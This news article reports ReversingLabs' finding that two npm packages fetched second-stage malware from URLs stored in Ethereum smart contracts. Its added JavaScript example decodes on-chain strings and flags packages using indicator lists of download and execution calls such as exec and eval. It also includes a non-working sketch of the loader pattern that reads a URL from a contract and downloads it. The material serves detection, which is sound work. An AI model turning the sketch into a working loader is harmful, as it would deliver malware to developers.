Attackers now use Ethereum smart contracts to hide malware

Ethereum has become the latest front for software supply chain attacks.

Researchers from ReversingLabs earlier this week disclosed two malicious npm packages that used Ethereum smart contracts to hide the download locations of harmful code, allowing the malware to bypass traditional security checks.

npm is the package manager for the Node.js runtime and is considered the largest software registry in the world, where developers access and share code that goes into millions of applications.

The packages, “colortoolsv2” and “mimelib2”, were uploaded to the widely used npm registry in July. At first glance they appeared to be simple utilities, but in practice they queried the Ethereum blockchain to retrieve hidden URLs that directed compromised systems to download second-stage malware.

By storing these instructions in a smart contract rather than in the package itself, the attackers disguised their activity as legitimate blockchain traffic, which makes detection more difficult: a scanner that greps package files for suspicious URLs finds none, and the network read looks like an ordinary RPC call to a public Ethereum node.
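The following is an added example and not code from ReversingLabs or from the reported packages. The first half shows the shape of the data involved: a contract function that returns a `string` hands an `eth_call` client an ABI-encoded hex payload, so a URL kept on-chain never appears as a URL in the package files. The second half is a triage heuristic a registry reviewer could run over a package's source files, flagging files that combine a chain read with a download or execution sink. The sample sources, the contract function name `getUrl`, the `example.invalid` URL and the indicator lists are all constructed for the illustration.

```javascript
// Added example (not ReversingLabs' code, nor code from the reported packages).

function abiWord(n) {
  // One 32-byte big-endian unsigned word, as used by Solidity ABI encoding.
  return Buffer.from(n.toString(16).padStart(64, '0'), 'hex');
}

function encodeAbiString(text) {
  // ABI encoding of a single dynamic `string` return value:
  // [offset = 32][byte length][utf8 bytes, right-padded to a 32-byte boundary]
  const bytes = Buffer.from(text, 'utf8');
  const padLen = (32 - (bytes.length % 32)) % 32;
  return '0x' + Buffer.concat([abiWord(32), abiWord(bytes.length), bytes, Buffer.alloc(padLen)]).toString('hex');
}

function decodeAbiString(hexData) {
  // Inverse of encodeAbiString; the bounds checks reject truncated or malformed payloads
  // instead of silently returning garbage.
  const buf = Buffer.from(hexData.replace(/^0x/, ''), 'hex');
  if (buf.length < 64) throw new Error('payload too short for an ABI string');
  const offset = Number(BigInt('0x' + buf.subarray(0, 32).toString('hex')));
  if (offset + 32 > buf.length) throw new Error('offset points outside payload');
  const length = Number(BigInt('0x' + buf.subarray(offset, offset + 32).toString('hex')));
  const start = offset + 32;
  if (start + length > buf.length) throw new Error('string length exceeds payload');
  return buf.subarray(start, start + length).toString('utf8');
}

// Constructed stand-in for what a read of such a contract returns. The domain is a
// reserved example name, not an address from the campaign.
const SAMPLE_ETH_CALL_RESULT = encodeAbiString('https://example.invalid/stage2.js');

// Indicator classes for a package source file. The identifiers are common Ethereum
// client and Node API names, chosen to illustrate the heuristic, not a complete list.
const INDICATORS = {
  chainRead: [/eth_call/, /JsonRpcProvider/, /new\s+Contract\s*\(/, /web3\.eth\b/],
  download: [/https?\.get\s*\(/, /\bfetch\s*\(/, /\baxios\b/],
  execute: [/child_process/, /\bexec(?:Sync)?\s*\(/, /\bspawn\s*\(/, /\beval\s*\(/, /new\s+Function\s*\(/],
};

function triagePackageSource(source) {
  const hits = {};
  for (const [kind, patterns] of Object.entries(INDICATORS)) {
    hits[kind] = patterns.filter((re) => re.test(source)).map(String);
  }
  // A chain read on its own is normal for a dapp or wallet tool; a chain read next to a
  // download or execution sink is the combination worth a human look.
  const suspicious = hits.chainRead.length > 0 && (hits.download.length > 0 || hits.execute.length > 0);
  return { ...hits, suspicious };
}

// Constructed sources. The first is what a colour helper might genuinely contain; the
// second sketches the reported pattern using hypothetical names (getUrl, RPC, ADDR).
const BENIGN_SOURCE = `
module.exports = function hexToRgb(hex) {
  const n = parseInt(hex.replace('#', ''), 16);
  return [(n >> 16) & 255, (n >> 8) & 255, n & 255];
};
`;

const SUSPICIOUS_SOURCE = `
const { JsonRpcProvider, Contract } = require('ethers');
const https = require('https');
const { exec } = require('child_process');
async function run() {
  const provider = new JsonRpcProvider(process.env.RPC);
  const c = new Contract(process.env.ADDR, ['function getUrl() view returns (string)'], provider);
  const url = await c.getUrl();                       // URL read from the chain, not from the package
  https.get(url, (res) => { /* write body to disk, then hand it to exec */ });
}
`;

console.log('decoded on-chain value:', decodeAbiString(SAMPLE_ETH_CALL_RESULT));
console.log('benign file:', triagePackageSource(BENIGN_SOURCE));
console.log('suspicious file:', triagePackageSource(SUSPICIOUS_SOURCE));
```

The heuristic is a triage aid, not a verdict: a legitimate trading bot that reads a contract and also shells out to a local tool will trip it, so the result should route the package to a reviewer rather than block it outright. The ABI decoder is there to make the point that the interesting string only exists after the RPC response is decoded, which is where a dynamic or network-aware scanner has to look.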

“This is something we have not seen before,” said ReversingLabs researcher Lucija Valentić in the report. “It highlights the rapid evolution of detection evasion strategies by malicious actors who trawl open source repositories and developers.”

The technique builds on an old playbook. Past attacks have used trusted services such as GitHub Gist, Google Drive or OneDrive to host malicious links. By using Ethereum smart contracts instead, the attackers added a crypto-flavoured twist to an already dangerous supply chain threat.

The incident is part of a wider campaign. ReversingLabs found the packages linked to fake GitHub repositories posing as cryptocurrency trading bots. These repositories were padded with fabricated commits, fake user accounts and inflated star counts to appear legitimate.

Developers who pulled in the code risked importing malware without being aware of it.

Supply chain risk in open source crypto tools is not new. Last year, researchers reported more than 20 malicious campaigns targeting developers through registries such as npm and PyPI.

Many aimed to steal wallet credentials or install cryptominers. But the use of Ethereum smart contracts as a delivery mechanism shows that adversaries adapt quickly to blend into blockchain ecosystems.

The takeaway for developers is that popular commits and active maintainers can be faked, and even apparently harmless repositories can carry hidden payloads.
